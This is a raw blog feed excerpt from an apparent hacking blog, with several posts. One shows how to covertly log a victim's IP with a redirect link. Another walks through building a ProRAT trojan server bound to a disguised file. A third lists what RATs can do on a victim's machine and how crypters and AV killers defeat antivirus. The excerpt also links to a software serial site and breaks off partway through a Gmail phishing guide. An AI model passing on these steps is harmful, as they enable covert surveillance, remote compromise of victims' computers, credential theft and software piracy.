&lt;span style="color: #555555; font-family: Arial, Helvetica, Tahoma, Verdana, sans-serif; font-size: small;"&gt;&lt;h2 style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: black; font: normal normal normal 28px/normal Georgia, 'Times New Roman', Times, serif; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;How to find IP Address of computer:&lt;/h2&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="line-height: 20px;"&gt;IP Finder service is provided by Syntaxmaster.info to find IP Address. This IP Finder is best solution i found to find IP Address. Just follow the steps:&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="line-height: 20px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="line-height: 20px;"&gt;&lt;span style="font-size: 12px;"&gt;1. Register at&amp;nbsp;&lt;a href="http://www.syntaxmaster.info/" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #e8a02c; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Syntaxmaster"&gt;&lt;span style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Syntaxmaster&lt;/span&gt;&lt;/a&gt;&amp;nbsp;site to find IP address.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 20px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 20px;"&gt;2. Now, after registration, login to your account select “Software/Tools”&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_5rpSJrmeITE/SsoVxHWm2OI/AAAAAAAAACI/Xv9aSsxtZpI/s1600-h/a979a6f1b4finder1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_5rpSJrmeITE/SsoVxHWm2OI/AAAAAAAAACI/Xv9aSsxtZpI/s320/a979a6f1b4finder1.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 20px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 20px;"&gt;3. Select “IP Stealer” and move on to next screen.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_5rpSJrmeITE/SsoV4k1opvI/AAAAAAAAACQ/Rjj72AD5QSM/s1600-h/eb463fe0deinder11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_5rpSJrmeITE/SsoV4k1opvI/AAAAAAAAACQ/Rjj72AD5QSM/s320/eb463fe0deinder11.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 20px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 20px;"&gt;4. You will be given a url with URL Redirection option. This URL Redirection option can be used to redirect the victim to required site to avoid any doubt of our intention to find IP Address.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_5rpSJrmeITE/SsoV-w8bRZI/AAAAAAAAACY/SmIveQMnaZY/s1600-h/b2134fb3a3inder31.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_5rpSJrmeITE/SsoV-w8bRZI/AAAAAAAAACY/SmIveQMnaZY/s320/b2134fb3a3inder31.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 20px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 20px;"&gt;&lt;span style="line-height: normal;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 20px;"&gt;&lt;span style="line-height: normal;"&gt;&lt;h2 style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: black; font: normal normal normal 28px/normal Georgia, 'Times New Roman', Times, serif; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;What you have to do??&lt;/h2&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 20px !important; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"&gt;Simply send this URL to victim and whenever he clicks on this link, his IP Address will be recorded at IP Finder helping you to find IP Address.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 20px !important; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"&gt;&lt;span style="line-height: normal;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 20px !important; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"&gt;Eg: You can use redirection url as some link for software download and send this IP Finder link to victim so that whenever he clicks on link, you are able to find IP Address.&lt;br /&gt;
&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 20px !important; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"&gt;So, I hope you have now well approached with this&amp;nbsp;&lt;strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;IP Finder&lt;/strong&gt;&amp;nbsp;method on&amp;nbsp;&lt;em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;how to find IP address.&lt;/em&gt;&amp;nbsp;IP finder service is best method to find IP Address. If you face any difficulty mention it in comments and comment if you like it..&lt;br /&gt;
&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 20px !important; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"&gt;njoy..&lt;br /&gt;
&lt;/div&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 20px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="line-height: 20px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-8043417772310828541?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/8043417772310828541/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/find-ip-address-of-remote-computer.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/8043417772310828541'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/8043417772310828541'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/find-ip-address-of-remote-computer.html' title='Find IP Address Of Remote Computer..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_5rpSJrmeITE/SsoVxHWm2OI/AAAAAAAAACI/Xv9aSsxtZpI/s72-c/a979a6f1b4finder1.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-5469316012216119612</id><published>2009-10-05T01:56:00.000+05:30</published><updated>2009-10-05T01:57:31.183+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Trojans'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Passwords'/><category scheme='http://www.blogger.com/atom/ns#' term='RATs'/><category scheme='http://www.blogger.com/atom/ns#' term='Remote Hacking'/><title type='text'>Remote PC Access Software : Demo..</title><content type='html'>I&amp;nbsp;mentioned about remote pc access software called RATs in my last post. As a reference to that article, i am posting this security article to inform about installation and use of PRORAT. PRORAT is a RAT (Remote Administration Tool) used as remote pc access software.&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_5rpSJrmeITE/SskEiR2Io2I/AAAAAAAAAB4/ymFqYfqIfSE/s1600-h/0c9301d34cprorat1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img $r="true" border="0" src="http://1.bp.blogspot.com/_5rpSJrmeITE/SskEiR2Io2I/AAAAAAAAAB4/ymFqYfqIfSE/s320/0c9301d34cprorat1.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;strong&gt;PRORAT - Remote pc access software:&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
1. Download &lt;a href="http://www.prorat.net/downloads.php"&gt;PRORAT &lt;/a&gt;software for remote pc access, by clicking on it.&lt;br /&gt;
2. Now, the unzipped file will contain Prorat.exe file. Run the file on your computer.&lt;br /&gt;
&lt;br /&gt;
3. Now, we have to create a server to send it to remote computer for remote pc access. So, click on Create -&amp;gt;Create Prorat server.&lt;br /&gt;
&lt;br /&gt;
4. Go to no-ip.com and register for an account. &lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
5. Now, in Pro connective notification, enter in IP(DNS) address, the link provided to you by no-ip and let all remaining fields remain unchecked. &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_5rpSJrmeITE/SskEs1tsGTI/AAAAAAAAACA/vZTthDlyun0/s1600-h/8e9bb96e4fprorat1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img $r="true" border="0" src="http://3.bp.blogspot.com/_5rpSJrmeITE/SskEs1tsGTI/AAAAAAAAACA/vZTthDlyun0/s320/8e9bb96e4fprorat1.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;6. Alongwith using Pro connective notification, you can even use your mail address to confirm about server installation.&lt;br /&gt;
&lt;br /&gt;
7. You can even bind the server with a specific file to prevent victim knowing about the server installation on his computer.&lt;br /&gt;
&lt;br /&gt;
8. To change server default icon, click on “Server icon” on left option pane and select any suitable icon according to binded file.&lt;br /&gt;
&lt;br /&gt;
9. Now, when all things are done, hit on “Create server” and you will get server created in Prorat directory. This server is used for remote pc access.&lt;br /&gt;
&lt;br /&gt;
10. This ends server creation part over here.&lt;br /&gt;
&lt;br /&gt;
Now, when you have created PRORAT server, next step is to send this server to victim computer and then use PRORAT for remote pc access. I will explain in&amp;nbsp;coming posts&amp;nbsp;about how to connect to remote PRORAT server on remote victim computer and then use this for remote pc access. If you have any problem in using this PRORAT, please mention it in comments section.&lt;br /&gt;
&lt;br /&gt;
njoy..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-5469316012216119612?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/5469316012216119612/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/remote-pc-access-software-demo.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/5469316012216119612'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/5469316012216119612'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/remote-pc-access-software-demo.html' title='Remote PC Access Software : Demo..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_5rpSJrmeITE/SskEiR2Io2I/AAAAAAAAAB4/ymFqYfqIfSE/s72-c/0c9301d34cprorat1.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-7131843163948607231</id><published>2009-10-05T01:41:00.000+05:30</published><updated>2009-10-05T01:43:45.139+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Trojans'/><category scheme='http://www.blogger.com/atom/ns#' term='RATs'/><category scheme='http://www.blogger.com/atom/ns#' term='Remote Hacking'/><title type='text'>Trojans or RATs:</title><content type='html'>In this article on remote computer hacking, I will inform you about hacking software to hack computer remotely. This software is called&amp;nbsp; RAT (Remote administration Tool) used to hack computer remotely.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;RATs :&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
RATs also called as Remote Administration tools are popularly used softwares to control other computer remotely and considering hacking aspects, hack computer remotely. There are many RATs such as:&lt;br /&gt;
Prorat&lt;br /&gt;
Turkojan&lt;br /&gt;
Yuri RAT and many other.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Working of RATs:&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To hack computer remotely using a RAT, you have to create a server and then send this server to victim whose you wanna hack computer remotely. Generally, this server is binded to any file say picture or song, so that whenever victim opens this file on his computer, our server is installed and this server opens port of victim computer and by using this opened port, you are able to hack computer remotely. &lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&lt;strong&gt;Things you can do by hacking computer remotely: &lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Once you gain access to remote computer, you can hack computer remotely and perform any of following:&lt;br /&gt;
# Install a keylogger&lt;br /&gt;
# Monitor Chat windows&lt;br /&gt;
# Shutdown computer remotely&lt;br /&gt;
# Take control of system registry&lt;br /&gt;
# Hack locally stored passwords and licence keys&lt;br /&gt;
# Download additional malware and servers to gain stronger control&lt;br /&gt;
# Control and access all Control Panel options(including add or remover programs)&lt;br /&gt;
# Send various Error messages&lt;br /&gt;
# Access Printer services&lt;br /&gt;
# Erase all disk data by formatting drives&lt;br /&gt;
# Open FTP connection and start file transaction&lt;br /&gt;
Thus, you are able to hack computer remotely 100%. This software to hack computer remotely is hence very popular.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Disadvantage of remote hacking software RAT:&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The main disadvantage of this software - RAT is that the server created to hack computer remotely is recognized by most antiviruses as hacktool and hence, antiviruses send alert messages when installing RAT server.&lt;br /&gt;
&lt;br /&gt;
But, there are many softwares like Binders or Crypters to hide RAT server and prevent antiviruses from sending alerts. Even there are softwares like AVkiller which is used to turn antivirus inactive and then our server (used to hack computer remotely) can be installed on victim computer very easily.&lt;br /&gt;
&lt;br /&gt;
This is all about RATs - softwares to hack computer remotely. In my coming posts, i will inform about server creation and installation on remote computer. If you have any problem with this article, please mention it in comments section.&lt;br /&gt;
&lt;br /&gt;
njoy..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-7131843163948607231?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/7131843163948607231/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/trojans-or-rats.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/7131843163948607231'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/7131843163948607231'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/trojans-or-rats.html' title='Trojans or RATs:'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-4067098374034386276</id><published>2009-10-05T00:57:00.000+05:30</published><updated>2009-10-05T00:58:12.900+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Mobile Hack'/><title type='text'>Secret Codes for Nokia Mobiles:</title><content type='html'>Type the Below codes on the Main Screen of Your Mobile:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*#06# - for checking the IMEI (International Mobile Equipment Identity).&lt;br /&gt;
&lt;br /&gt;
*#7780# - Reset to factory settings.&lt;br /&gt;
&lt;br /&gt;
*#67705646# - This will clear the LCD display (operator logo).&lt;br /&gt;
&lt;br /&gt;
*#0000# - To view software version.&lt;br /&gt;
&lt;br /&gt;
*#2820# - Blue tooth device address.&lt;br /&gt;
&lt;br /&gt;
*#746025625# - Sim clock allowed status.&lt;br /&gt;
&lt;br /&gt;
*#62209526# - Display the MAC address of the WLAN adapter. This is available only in the newer devices that support WLAN&lt;br /&gt;
&lt;br /&gt;
#pw+1234567890+1# - Shows if sim have restrictions.&lt;br /&gt;
&lt;br /&gt;
*#92702689# - Takes you to a secret menu where you may find some of the information below:&lt;br /&gt;
&lt;br /&gt;
1. Displays Serial Number.&lt;br /&gt;
&lt;br /&gt;
2. Displays the Month and Year of Manufacture&lt;br /&gt;
&lt;br /&gt;
3. Displays (if there) the date where the phone was purchased (MMYY)&lt;br /&gt;
&lt;br /&gt;
4. Displays the date of the last repair - if found (0000)&lt;br /&gt;
&lt;br /&gt;
5. Shows life timer of phone (time passes since last start)&lt;br /&gt;
&lt;br /&gt;
*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.&lt;br /&gt;
&lt;br /&gt;
*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.&lt;br /&gt;
&lt;br /&gt;
*#4720# - Half Rate Codec activation.&lt;br /&gt;
&lt;br /&gt;
*#4720* - Half Rate Codec deactivation. The phone will automatically restart&lt;br /&gt;
&lt;br /&gt;
If you forgot wallet code for Nokia S60 phones, use this code for reset: *#7370925538#&lt;br /&gt;
&lt;br /&gt;
Note, your data in the wallet will be erased. Phone will ask you the lock code.&lt;br /&gt;
&lt;br /&gt;
Default lock code is: 12345&lt;br /&gt;
&lt;br /&gt;
Press *#3925538# to delete the contents and code of wallet.&lt;br /&gt;
&lt;br /&gt;
*#7328748263373738# resets security code.&lt;br /&gt;
&lt;br /&gt;
Default security code is 12345&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-4067098374034386276?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/4067098374034386276/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/secret-codes-for-nokia-mobiles.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/4067098374034386276'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/4067098374034386276'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/secret-codes-for-nokia-mobiles.html' title='Secret Codes for Nokia Mobiles:'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-974368096518367081</id><published>2009-10-03T23:17:00.000+05:30</published><updated>2009-10-04T02:30:21.333+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Serial and Crack'/><title type='text'>Best site to find all the Serials you need..</title><content type='html'>Ya i know it sucks, searching for the serials over google, passing from sites to sites to find the one.. It Sucks..!! It really do...&lt;br /&gt;
So, Here is the site you can find all the serials you need..&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.theserials.com/"&gt;http://www.theserials.com/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Njoy..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-974368096518367081?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/974368096518367081/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/best-site-to-find-all-serials-you-need.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/974368096518367081'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/974368096518367081'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/best-site-to-find-all-serials-you-need.html' title='Best site to find all the Serials you need..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-1520003615521978461</id><published>2009-10-03T22:25:00.001+05:30</published><updated>2009-10-22T23:30:15.558+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Passwords'/><title type='text'>Hacking Email Account Passwords... hack Gmail..</title><content type='html'>So, the main&amp;nbsp;essence&amp;nbsp;of hacking lies in the Mail Password Cracking.. Isn't It.. N ya&amp;nbsp;of course&amp;nbsp;many out there are looking for the ways to do so.. So here is the post answering to the questions like "How to hack an Email Id" or "Where to download free Hacking Tool or Software", etc, etc..&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px;"&gt;Now u'll be able to hack any email account...&lt;em style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;hack any email account password&lt;/em&gt;... hack gmail&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;After this you should know "almost" all the top and popular ways on How to Hack an Email account password...&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;span style="display: inline; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Here we go:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px;"&gt;&lt;span style="font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;1.Phishing:&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;/span&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;So far, this is one of the most popular method used in hacking email account passwords as with this method you get a mail containing victim's username and password...&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;Phishing is a way of saying Keylogger&amp;nbsp;but in another way. Let's say you want to create a hotmail phishing page...The page should look exactly like the real one.&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;How does it work:&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;You can download/make a replica(phisher) of the website you want to phish...and save it as an HTML file. When you're done with that,you have to find a way to upload the HTML.&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;Best way is a Website (Free Hosting). Like Piczo/Blogspot etc.&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 